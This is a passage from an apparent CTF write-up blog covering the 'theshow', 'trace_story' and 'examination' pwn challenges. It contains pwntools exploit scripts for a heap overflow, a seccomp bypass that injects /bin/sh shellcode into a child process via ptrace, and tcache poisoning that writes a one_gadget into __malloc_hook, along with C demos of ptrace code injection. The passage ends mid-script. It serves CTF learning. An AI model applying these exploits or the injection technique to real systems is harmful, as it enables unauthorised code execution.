<h2 id="exp-1"><a href="#exp-1" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">'theshow'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'node4.buuoj.cn'</span>,<span class="number">20002</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">mainAct = <span class="number">0x0000000006F76C0</span></span><br><span class="line">showDescription = <span class="number">0x0000000006E84F0</span></span><br><span class="line">win = <span class="number">0x000000000400BED</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">'What is the name of your 
act?'</span>,<span class="string">'aaaa'</span>)</span><br><span class="line">p.sendlineafter(<span class="string">'How long do you want the show description to be?'</span>,<span class="built_in">str</span>(<span class="number">0x80</span>))</span><br><span class="line">payload = <span class="string">'f'</span>*<span class="number">0x88</span> + p64(<span class="number">0x71</span>) + <span class="string">'f'</span>*<span class="number">0x60</span> + p64(win)</span><br><span class="line">p.sendlineafter(<span class="string">'Describe the show for us:'</span>,payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="Tracestory"><a href="#Tracestory" class="headerlink" title="Tracestory"></a>Tracestory</h1><blockquote>
<p>I am trying to figure out the end of this story, but I am not able to read it. Could you help me figure out what it is?</p>
<p><strong>Author</strong>: WittsEnd2</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">0.cloud.chals.io 15148</span><br></pre></td></tr></table></figure>
<p>tag: seccomp shellcode </p>
</blockquote>
<h2 id="概要-1"><a href="#概要-1" class="headerlink" title="概要"></a>Overview</h2><p>A <code>seccomp</code> challenge: we hand the parent process hand-written assembly that uses <code>ptrace</code> to inject <code>shellcode</code> into the child process's <code>text</code> segment, which bypasses the <code>seccomp</code> filter.</p>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>Vulnerability analysis</h2><p>The parent <code>fork</code>s the child before any <code>seccomp</code> rules are installed. The parent then reads user input, calls <code>setup_seccomp</code>, and runs that input as code under the <code>seccomp</code> filter.</p>
<p>Because the child was forked before the filter was installed it carries no <code>seccomp</code> filter at all, and <code>ptrace</code> is on the parent's allow list, so the parent can control the child through <code>ptrace</code> without being blocked.</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="comment">// seccomp-tools dump ./trace_story</span></span><br><span class="line">line CODE JT JF K</span><br><span class="line">=================================</span><br><span class="line"> <span class="number">0000</span>: <span class="number">0x20</span> <span class="number">0x00</span> <span class="number">0x00</span> <span class="number">0x00000004</span> A = arch</span><br><span class="line"> <span class="number">0001</span>: <span class="number">0x15</span> <span class="number">0x00</span> <span class="number">0x18</span> <span class="number">0xc000003e</span> <span class="keyword">if</span> (A != ARCH_X86_64) <span class="keyword">goto</span> <span class="number">0026</span></span><br><span class="line"> <span class="number">0002</span>: <span class="number">0x20</span> <span class="number">0x00</span> <span class="number">0x00</span> <span class="number">0x00000000</span> A = sys_number</span><br><span class="line"> <span class="number">0003</span>: <span class="number">0x35</span> <span class="number">0x00</span> <span class="number">0x01</span> <span class="number">0x40000000</span> <span class="keyword">if</span> (A < <span class="number">0x40000000</span>) <span class="keyword">goto</span> <span class="number">0005</span></span><br><span class="line"> <span class="number">0004</span>: <span class="number">0x15</span> <span class="number">0x00</span> <span class="number">0x15</span> <span class="number">0xffffffff</span> <span class="keyword">if</span> (A != <span class="number">0xffffffff</span>) <span class="keyword">goto</span> <span class="number">0026</span></span><br><span class="line"> <span class="number">0005</span>: <span class="number">0x15</span> <span class="number">0x13</span> <span class="number">0x00</span> <span class="number">0x00000003</span> <span class="keyword">if</span> (A == close) <span class="keyword">goto</span> <span 
class="number">0025</span></span><br><span class="line"> <span class="number">0006</span>: <span class="number">0x15</span> <span class="number">0x12</span> <span class="number">0x00</span> <span class="number">0x00000004</span> <span class="keyword">if</span> (A == stat) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0007</span>: <span class="number">0x15</span> <span class="number">0x11</span> <span class="number">0x00</span> <span class="number">0x00000005</span> <span class="keyword">if</span> (A == fstat) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0008</span>: <span class="number">0x15</span> <span class="number">0x10</span> <span class="number">0x00</span> <span class="number">0x00000006</span> <span class="keyword">if</span> (A == lstat) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0009</span>: <span class="number">0x15</span> <span class="number">0x0f</span> <span class="number">0x00</span> <span class="number">0x0000000a</span> <span class="keyword">if</span> (A == mprotect) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0010</span>: <span class="number">0x15</span> <span class="number">0x0e</span> <span class="number">0x00</span> <span class="number">0x0000000c</span> <span class="keyword">if</span> (A == brk) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0011</span>: <span class="number">0x15</span> <span class="number">0x0d</span> <span class="number">0x00</span> <span class="number">0x00000015</span> <span class="keyword">if</span> (A == access) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0012</span>: <span 
class="number">0x15</span> <span class="number">0x0c</span> <span class="number">0x00</span> <span class="number">0x00000018</span> <span class="keyword">if</span> (A == sched_yield) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0013</span>: <span class="number">0x15</span> <span class="number">0x0b</span> <span class="number">0x00</span> <span class="number">0x00000020</span> <span class="keyword">if</span> (A == dup) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0014</span>: <span class="number">0x15</span> <span class="number">0x0a</span> <span class="number">0x00</span> <span class="number">0x00000021</span> <span class="keyword">if</span> (A == dup2) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0015</span>: <span class="number">0x15</span> <span class="number">0x09</span> <span class="number">0x00</span> <span class="number">0x00000038</span> <span class="keyword">if</span> (A == clone) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0016</span>: <span class="number">0x15</span> <span class="number">0x08</span> <span class="number">0x00</span> <span class="number">0x0000003c</span> <span class="keyword">if</span> (A == <span class="built_in">exit</span>) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0017</span>: <span class="number">0x15</span> <span class="number">0x07</span> <span class="number">0x00</span> <span class="number">0x0000003e</span> <span class="keyword">if</span> (A == kill) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0018</span>: <span class="number">0x15</span> <span class="number">0x06</span> <span 
class="number">0x00</span> <span class="number">0x00000050</span> <span class="keyword">if</span> (A == chdir) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0019</span>: <span class="number">0x15</span> <span class="number">0x05</span> <span class="number">0x00</span> <span class="number">0x00000051</span> <span class="keyword">if</span> (A == fchdir) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0020</span>: <span class="number">0x15</span> <span class="number">0x04</span> <span class="number">0x00</span> <span class="number">0x00000060</span> <span class="keyword">if</span> (A == gettimeofday) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0021</span>: <span class="number">0x15</span> <span class="number">0x03</span> <span class="number">0x00</span> <span class="number">0x00000065</span> <span class="keyword">if</span> (A == ptrace) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0022</span>: <span class="number">0x15</span> <span class="number">0x02</span> <span class="number">0x00</span> <span class="number">0x00000066</span> <span class="keyword">if</span> (A == getuid) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0023</span>: <span class="number">0x15</span> <span class="number">0x01</span> <span class="number">0x00</span> <span class="number">0x00000068</span> <span class="keyword">if</span> (A == getgid) <span class="keyword">goto</span> <span class="number">0025</span></span><br><span class="line"> <span class="number">0024</span>: <span class="number">0x15</span> <span class="number">0x00</span> <span class="number">0x01</span> <span class="number">0x000000e7</span> <span class="keyword">if</span> (A != 
exit_group) <span class="keyword">goto</span> <span class="number">0026</span></span><br><span class="line"> <span class="number">0025</span>: <span class="number">0x06</span> <span class="number">0x00</span> <span class="number">0x00</span> <span class="number">0x7fff0000</span> <span class="keyword">return</span> ALLOW</span><br><span class="line"> <span class="number">0026</span>: <span class="number">0x06</span> <span class="number">0x00</span> <span class="number">0x00</span> <span class="number">0x00000000</span> <span class="keyword">return</span> KILL</span><br></pre></td></tr></table></figure>
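<p>To check what the dumped program actually permits without loading it into a kernel, here is an added example (not part of the writeup or the challenge): a minimal classic-BPF interpreter covering only the four opcodes the dump uses, fed with the 27 instructions transcribed from the table above. The names <code>run_cbpf</code>, <code>filter_decision</code> and <code>allowed_syscall_count</code> are this example's own; <code>struct seccomp_data_view</code> mirrors the kernel's <code>struct seccomp_data</code> layout (<code>nr</code> at offset 0, <code>arch</code> at offset 4).</p>

```c
/* Added example: evaluate the trace_story seccomp filter offline with a
 * tiny cBPF interpreter. Not the challenge's or the writeup's code. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define AUDIT_ARCH_X86_64  0xc000003eu
#define SECCOMP_RET_ALLOW  0x7fff0000u
#define SECCOMP_RET_KILL   0x00000000u

/* Classic BPF instruction: 16-bit opcode, jump-true/false offsets, constant. */
struct cbpf_insn { uint16_t code; uint8_t jt, jf; uint32_t k; };

enum {
    CBPF_LD_W_ABS = 0x20,  /* A = *(u32 *)(data + k)    */
    CBPF_JEQ_K    = 0x15,  /* pc += (A == k) ? jt : jf   */
    CBPF_JGE_K    = 0x35,  /* pc += (A >= k) ? jt : jf   */
    CBPF_RET_K    = 0x06   /* return k                   */
};

/* Same layout as the kernel's struct seccomp_data (nr @0, arch @4, ip @8, args @16). */
struct seccomp_data_view {
    int32_t  nr;
    uint32_t arch;
    uint64_t instruction_pointer;
    uint64_t args[6];
};

/* Transcribed from the seccomp-tools dump above: {code, jt, jf, k} per line. */
static const struct cbpf_insn trace_story_filter[] = {
    {0x20, 0x00, 0x00, 0x00000004}, {0x15, 0x00, 0x18, 0xc000003e},
    {0x20, 0x00, 0x00, 0x00000000}, {0x35, 0x00, 0x01, 0x40000000},
    {0x15, 0x00, 0x15, 0xffffffff},
    {0x15, 0x13, 0x00, 0x03}, {0x15, 0x12, 0x00, 0x04}, {0x15, 0x11, 0x00, 0x05},
    {0x15, 0x10, 0x00, 0x06}, {0x15, 0x0f, 0x00, 0x0a}, {0x15, 0x0e, 0x00, 0x0c},
    {0x15, 0x0d, 0x00, 0x15}, {0x15, 0x0c, 0x00, 0x18}, {0x15, 0x0b, 0x00, 0x20},
    {0x15, 0x0a, 0x00, 0x21}, {0x15, 0x09, 0x00, 0x38}, {0x15, 0x08, 0x00, 0x3c},
    {0x15, 0x07, 0x00, 0x3e}, {0x15, 0x06, 0x00, 0x50}, {0x15, 0x05, 0x00, 0x51},
    {0x15, 0x04, 0x00, 0x60}, {0x15, 0x03, 0x00, 0x65}, {0x15, 0x02, 0x00, 0x66},
    {0x15, 0x01, 0x00, 0x68}, {0x15, 0x00, 0x01, 0xe7},
    {0x06, 0x00, 0x00, SECCOMP_RET_ALLOW},
    {0x06, 0x00, 0x00, SECCOMP_RET_KILL},
};

/* Run a cBPF program over one syscall record; unknown opcodes fail closed. */
uint32_t run_cbpf(const struct cbpf_insn *prog, size_t n,
                  const struct seccomp_data_view *data)
{
    uint32_t A = 0;
    size_t pc = 0;
    while (pc < n) {
        const struct cbpf_insn *in = &prog[pc++];
        switch (in->code) {
        case CBPF_LD_W_ABS:
            if (in->k + 4 > sizeof *data) return SECCOMP_RET_KILL;
            memcpy(&A, (const uint8_t *)data + in->k, 4);
            break;
        case CBPF_JEQ_K: pc += (A == in->k) ? in->jt : in->jf; break;
        case CBPF_JGE_K: pc += (A >= in->k) ? in->jt : in->jf; break;
        case CBPF_RET_K: return in->k;
        default:         return SECCOMP_RET_KILL;
        }
    }
    return SECCOMP_RET_KILL;  /* fell off the end; the kernel rejects such programs */
}

/* Decision the trace_story filter makes for one (arch, syscall number) pair. */
uint32_t filter_decision(uint32_t arch, uint32_t nr)
{
    struct seccomp_data_view d = { .nr = (int32_t)nr, .arch = arch };
    return run_cbpf(trace_story_filter,
                    sizeof trace_story_filter / sizeof trace_story_filter[0], &d);
}

/* Enumerate the allow list: how many of the first 512 x86_64 syscall numbers pass. */
int allowed_syscall_count(void)
{
    int count = 0;
    for (uint32_t nr = 0; nr < 512; nr++)
        if (filter_decision(AUDIT_ARCH_X86_64, nr) == SECCOMP_RET_ALLOW)
            count++;
    return count;
}

int main(void)
{
    printf("ptrace(101): %s\n",
           filter_decision(AUDIT_ARCH_X86_64, 101) == SECCOMP_RET_ALLOW ? "ALLOW" : "KILL");
    printf("wait4(61):   %s\n",
           filter_decision(AUDIT_ARCH_X86_64, 61) == SECCOMP_RET_ALLOW ? "ALLOW" : "KILL");
    printf("allowed syscalls in 0..511: %d\n", allowed_syscall_count());
    return 0;
}
```

<p>Two things the enumeration makes obvious that are easy to miss when reading the table: the x32 ABI range (numbers with bit 30 set) is killed outright by instructions 0003 and 0004, and <code>wait4</code> is not in the list, which matters for the ptrace flow described next.</p>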
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>Exploitation</h2><p>The child process sits in an infinite loop, so we can overwrite the <code>text</code> segment at the start of that loop.</p>
<p>Flow for attaching to the child with <code>ptrace</code>:</p>
<ul>
<li>Trace the process with the given <code>pid</code>: <code>ptrace(PTRACE_ATTACH, CHILD_PID, 0, 0)</code></li>
<li>Wait for the child to stop after being attached: <code>wait(0)</code></li>
<li>Write one machine word (8 bytes on x86_64, not a single byte) at the address given by <code>addr</code>: <code>ptrace(PTRACE_POKETEXT, CHILD_PID, CODE_ADDRESS, 8_BYTES_OF_CODE)</code>. The write lands even though the <code>text</code> mapping is read-only, so no <code>mprotect</code> is needed.</li>
<li>Stop tracing: <code>ptrace(PTRACE_DETACH, CHILD_PID, 0, 0)</code></li>
<li>attach -> write_text -> detach -> go back to beginning. Note that <code>wait4</code> is not on the allow list above, so the injected shellcode cannot actually wait for the stop; instead the exp below repeats the whole sequence (<code>jmp begin</code>) until the writes land and the detach releases the child into the new code.</li>
</ul>
<p><a href="https://www.jianshu.com/p/b1f9d6911c90">ptrace function reference</a></p>
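<p>The same attach / poke / detach primitive in plain C, as an added example that is not the challenge's code or either referenced writeup's: the parent forks a child that spins forever, reads the child's <code>RIP</code> after the attach stop, writes a 16-byte <code>exit(code)</code> stub there in two <code>PTRACE_POKETEXT</code> words, detaches, and collects the exit status. It assumes x86_64 Linux; <code>spin_forever</code>, <code>build_exit_stub</code> and <code>inject_exit_code</code> are this example's own names. No <code>seccomp</code> filter is installed here, so unlike the challenge shellcode it can simply <code>waitpid</code> for the stop. <code>ptrace</code> may be refused (<code>EPERM</code>) under a restrictive <code>ptrace_scope</code> or sandbox; in that case the function returns <code>-errno</code> after killing the child.</p>

```c
/* Added example: ptrace-based code injection into a forked child on x86_64
 * Linux. Not the challenge's code. */
#define _GNU_SOURCE
#include <errno.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

/* Stand-in for the challenge's child: it never leaves this loop on its own. */
static void __attribute__((noinline)) spin_forever(void)
{
    for (volatile int keep = 1; keep; )
        ;
}

/* 16-byte stub: mov edi, code ; mov eax, 60 (SYS_exit) ; syscall ; nop padding.
 * Two machine words, because PTRACE_POKETEXT writes exactly one word per call. */
static void build_exit_stub(uint8_t stub[16], int32_t code)
{
    static const uint8_t tmpl[16] = {
        0xbf, 0x00, 0x00, 0x00, 0x00,   /* mov edi, imm32 (patched below) */
        0xb8, 0x3c, 0x00, 0x00, 0x00,   /* mov eax, 60                    */
        0x0f, 0x05,                     /* syscall                        */
        0x90, 0x90, 0x90, 0x90          /* nop x4, pad to a word boundary */
    };
    memcpy(stub, tmpl, sizeof tmpl);
    memcpy(stub + 1, &code, sizeof code);  /* little-endian immediate */
}

/* Kill and reap the child after a failed ptrace step; return -errno. */
static int reap_failed(pid_t child)
{
    int err = errno;
    kill(child, SIGKILL);
    waitpid(child, NULL, 0);
    return -err;
}

/* Fork a spinning child, inject exit(code) over its current instruction,
 * detach, and return the child's exit status (or -errno on failure). */
int inject_exit_code(int32_t code)
{
    pid_t child = fork();
    if (child < 0)
        return -errno;
    if (child == 0) {
        spin_forever();
        _exit(1);  /* never reached */
    }

    /* 1. attach: the kernel sends SIGSTOP and makes us the tracer */
    if (ptrace(PTRACE_ATTACH, child, NULL, NULL) < 0)
        return reap_failed(child);

    /* 2. wait for the stop; the challenge filter forbids wait4, which is why
     *    the exploit shellcode retries in a loop instead of doing this */
    int status;
    if (waitpid(child, &status, 0) < 0 || !WIFSTOPPED(status))
        return reap_failed(child);

    /* 3. read RIP so the injected bytes are the next thing the child executes */
    struct user_regs_struct regs;
    if (ptrace(PTRACE_GETREGS, child, NULL, &regs) < 0)
        return reap_failed(child);

    uint8_t stub[16];
    build_exit_stub(stub, code);
    for (size_t off = 0; off < sizeof stub; off += sizeof(long)) {
        long word;
        memcpy(&word, stub + off, sizeof word);
        /* POKETEXT writes through the r-x mapping: no mprotect needed */
        void *addr = (void *)(uintptr_t)(regs.rip + off);
        if (ptrace(PTRACE_POKETEXT, child, addr, (void *)word) < 0)
            return reap_failed(child);
    }

    /* 4. detach: the child resumes at RIP and runs our stub */
    if (ptrace(PTRACE_DETACH, child, NULL, NULL) < 0)
        return reap_failed(child);

    if (waitpid(child, &status, 0) < 0)
        return -errno;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    int r = inject_exit_code(42);
    if (r < 0)
        fprintf(stderr, "ptrace injection failed: %s\n", strerror(-r));
    else
        printf("child exited with status %d\n", r);
    return r == 42 ? 0 : 1;
}
```

<p>Writing at the stopped <code>RIP</code> rather than at a fixed address is what makes the demo independent of compiler layout; the challenge exploit can hard-code <code>0x401789</code> instead because the binary is not PIE and the child's loop address is known from the disassembly.</p>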
<h2 id="exp-2"><a href="#exp-2" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.binary = ELF(<span class="string">'trace_story'</span>)</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">p = process(<span class="string">'./trace_story'</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">"pid: "</span>)</span><br><span class="line">pid = <span class="built_in">int</span>(p.recvline().strip())</span><br><span class="line"><span class="built_in">print</span>(<span class="string">"pid: "</span>,pid)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">"begin:"</span></span><br><span class="line">payload += shellcraft.ptrace(constants.linux.PTRACE_ATTACH, pid, <span class="number">0</span>, <span class="number">0</span>)</span><br><span class="line">binsh = asm(shellcraft.sh())</span><br><span class="line">start_addr = <span class="number">0x401789</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="built_in">int</span>(<span class="built_in">len</span>(binsh)/<span class="number">8</span>)):</span><br><span class="line"> shellcode = u64(binsh[i * <span class="number">8</span>:<span class="number">8</span>+(i*<span class="number">8</span>)])</span><br><span class="line"> payload += shellcraft.ptrace(constants.linux.PTRACE_POKETEXT, pid, start_addr + (i * <span class="number">8</span>), shellcode)</span><br><span class="line">payload += shellcraft.ptrace(constants.linux.PTRACE_DETACH, pid, <span class="number">0</span>, <span class="number">0</span>)</span><br><span 
class="line">payload += <span class="string">"""</span></span><br><span class="line"><span class="string">jmp begin</span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b'Input: \n'</span>, asm(payload))</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p><a href="https://elbiazo.com/posts/umdctf-2022/">Reference 1</a> <a href="https://github.com/datajerk/ctf-write-ups/tree/master/umdctf2022/trace_story">Reference 2</a></p>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
<tags>
<tag>python2</tag>
<tag>ROP</tag>
<tag>fmt</tag>
<tag>heap-overflow</tag>
<tag>seccomp</tag>
<tag>shellcode</tag>
</tags>
</entry>
<entry>
<title>XCTF-StartCTF</title>
<url>/article/XCTF-StartCTF/</url>
<content><![CDATA[<h1 id="XCTF-StartCTF"><a href="#XCTF-StartCTF" class="headerlink" title="XCTF-StartCTF"></a>XCTF-StartCTF</h1><!-- 文章页 配置 -->
<h1 id="examination"><a href="#examination" class="headerlink" title="examination"></a>examination</h1><blockquote>
<p>ret2school once again<br>nc 124.70.130.92 60001</p>
</blockquote>
<h2 id="结构体"><a href="#结构体" class="headerlink" title="结构体"></a>Structs</h2><figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">student</span></span></span><br><span class="line"><span class="class">{</span></span><br><span class="line"> __int64 *score_addr;</span><br><span class="line"> __int64 null;</span><br><span class="line"> __int64 *mode_addr;</span><br><span class="line"> <span class="keyword">int</span> pray_flag;</span><br><span class="line"> <span class="keyword">int</span> reward_flag;</span><br><span class="line"> </span><br><span class="line">}S;</span><br><span class="line"><span class="comment">// chunk size = 0x30</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">student_score</span></span></span><br><span class="line"><span class="class">{</span></span><br><span class="line"> <span class="keyword">int</span> number_of_questions;</span><br><span class="line"> <span class="keyword">int</span> score;</span><br><span class="line"> <span class="keyword">char</span> *review_addr;</span><br><span class="line"> <span class="keyword">int</span> review_size;</span><br><span class="line">}Ss;</span><br><span class="line"><span class="comment">// chunk size = 0x20</span></span><br></pre></td></tr></table></figure>
<h2 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>Exploitation approach</h2><ol>
<li>student_pray -> teacher_score: subtracting 10 from the score causes an integer overflow, which satisfies the <code>check for review</code> condition that grants an arbitrary-address +1.</li>
<li>Apply the +1 to the address of <code>review_size</code>, so the review write and the show both go out of bounds.</li>
<li>Use that to attack tcache first, then write a one_gadget into <code>__malloc_hook</code>.</li>
<li>Teacher option 6 triggers <code>malloc</code> and gives a shell.</li>
</ol>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">'examination'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'node4.buuoj.cn'</span>,<span class="number">25323</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">'./libc.so.6'</span>)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span 
class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'choice>> '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="comment">########################### Teacher ##############################</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">num</span>):</span></span><br><span class="line"> cmd(<span class="number">1</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'questions: '</span>,<span class="built_in">str</span>(num))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">score</span>():</span></span><br><span class="line"> cmd(<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write_a_review_first</span>(<span class="params">index,size,comment</span>):</span></span><br><span class="line"> cmd(<span class="number">3</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'which one? 
> '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> p.sendlineafter(<span class="string">'size of comment: '</span>,<span class="built_in">str</span>(size))</span><br><span class="line"> p.sendlineafter(<span class="string">'enter your comment:'</span>,comment)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write_a_review</span>(<span class="params">index,comment</span>):</span></span><br><span class="line"> cmd(<span class="number">3</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'which one? > '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> p.sendlineafter(<span class="string">'enter your comment:'</span>,comment)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">parent</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">4</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'choose?\n'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="comment">########################### Student ##############################</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">student_check</span>():</span></span><br><span class="line"> cmd(<span class="number">2</span>)</span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">student_pray</span>():</span></span><br><span class="line"> cmd(<span class="number">3</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">student_mode</span>(<span 
class="params">mode,score=<span class="literal">None</span></span>):</span></span><br><span class="line"> cmd(<span class="number">4</span>)</span><br><span class="line"> data = p.recvline()</span><br><span class="line"> <span class="keyword">if</span> <span class="string">"100"</span> <span class="keyword">in</span> data:</span><br><span class="line"> p.sendline(score)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> p.sendline(mode)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">student_changeid</span>(<span class="params">ID</span>):</span></span><br><span class="line"> cmd(<span class="number">6</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'input your id: '</span>,<span class="built_in">str</span>(ID))</span><br><span class="line"></span><br><span class="line"><span class="comment">#########################################################</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">studenttoTeacher</span>():</span></span><br><span class="line"> cmd(<span class="number">5</span>)</span><br><span class="line"> role(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">teachertoStudent</span>():</span></span><br><span class="line"> cmd(<span class="number">5</span>)</span><br><span class="line"> role(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">role</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'<0.teacher/1.student>: '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span 
class="comment">#########################################################</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p,'b *$rebase(0x1e0b)')</span></span><br><span class="line"></span><br><span class="line">role(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">1</span>)</span><br><span class="line">teachertoStudent()</span><br><span class="line">student_pray()</span><br><span class="line">studenttoTeacher()</span><br><span class="line">score()</span><br><span class="line">write_a_review_first(<span class="number">0</span>,<span class="number">0x10</span>,<span class="string">'a'</span>*<span class="number">0x10</span>)</span><br><span class="line">teachertoStudent()</span><br><span class="line">student_check()</span><br><span class="line">p.recvuntil(<span class="string">'reward! '</span>)</span><br><span class="line">heap_base = <span class="built_in">int</span>(p.recv(<span class="number">14</span>),<span class="number">16</span>) - <span class="number">0x2a0</span></span><br><span class="line">log.success(<span class="string">'addr: '</span> + <span class="built_in">hex</span>(heap_base))</span><br><span class="line">p.sendlineafter(<span class="string">'add 1 to wherever you want! 
